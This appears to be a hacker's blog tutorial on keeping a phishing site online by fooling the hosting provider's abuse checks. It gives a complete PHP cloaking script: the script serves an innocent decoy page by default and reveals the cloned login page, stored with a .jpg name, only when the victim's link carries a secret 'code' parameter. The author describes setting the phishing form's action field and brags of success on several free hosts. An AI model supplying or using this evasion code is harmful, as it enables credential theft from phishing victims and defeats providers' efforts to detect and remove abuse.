Hacking web application is always curious for the script kiddies.
And hacking free web email account is every geek first attempt and it was also same for me too.
I have created my first phishing page when I was in standard 9.
After i'v created the phishing page it's got suspended within 5-6 hours. :( So it was a big challenge for me to host my phishing sites. But it was big a challenge until I’v learned some basics of php.
Here i will not describe how phishing works and how to make fake page.
I will describe how can you fool your hosting provides and host your phishing content to their server without getting suspended by them.
While Web Hosting providers attempts to find all phishing attempts from their servers, sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files.
This concept is to serve a different innocent looking web page instead of your phishing page when your hosting provider try to access your uploaded content.
but when you send the link to your phishing site to victim you will send the link with a unique identification number(through URL i will come to this later).
Then only your innocent looking uploaded file turn into a phishing page.
I have tried this with 2-3 free hosting providers and every time i succeeded.
In normal scenario when you design your phishing page and upload files to your hosting account,
your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account.
So how to bypass this??
Open any page you want to clone in your favorite browser.
Save the full page in .html.This step is almost common for every phishing attempt.
After saving the page you will get the page's source code and also get a folder containing all the images and client side scripts.
I am assuming, you know how to configure the action field of the form/login page to configure a phishing page.
So after changing the action field what you have to do just rename the “html” page to ".jpg"
For example if you have "Login.html". Just rename it to "Login.jpg".
Now you have to choose any web page which will be served when your web hosting providers or anyone without having that unique identification number access the page.Do the same thing with that fake page also and rename it to "fake.jpg"
Create a new file called “phishing.php” and write following content into it.
<?php
$id = $_GET["code"];
if ($id == "yourpasscode") {
$myFile = "main.jpg";
$fh = fopen($myFile, 'r');
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}
else{
$myFile1 = "fake.jpg";
$fh1 = fopen($myFile1, 'r');
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>
In this code you just have to do following modification..
1>Change "yourpasscode" to your desired one.
2>Change "main.jpg" to the file name which one contain the real phishing web page's code "Login.jpg"
3>Change "fake.jpg" to the file which file will contain the code of the fake page.
Now you have got the follwing files:
1)phishing.php
2)login.jpg
3)fake.jpg
4)A folder[Contains all the client side scriots and images for the real phishing page]
Now just upload all this to your hosting account.And try to access the
http://yoursite.com/phishing.php
with your browser.
Here you will get the fake page which is not actual login page.
Now try to access
http://yoursite.com/phishing.php?code=yourpasscode
your phishing page will open.
If you want to change the GET parameter "code" just modify the second line of the php script.
Now what will happen,when your hosting privder will test your content they will get a innocent php file reading another file.and when they try will to access "login.jpg" file they will get an invalid/corrupted image.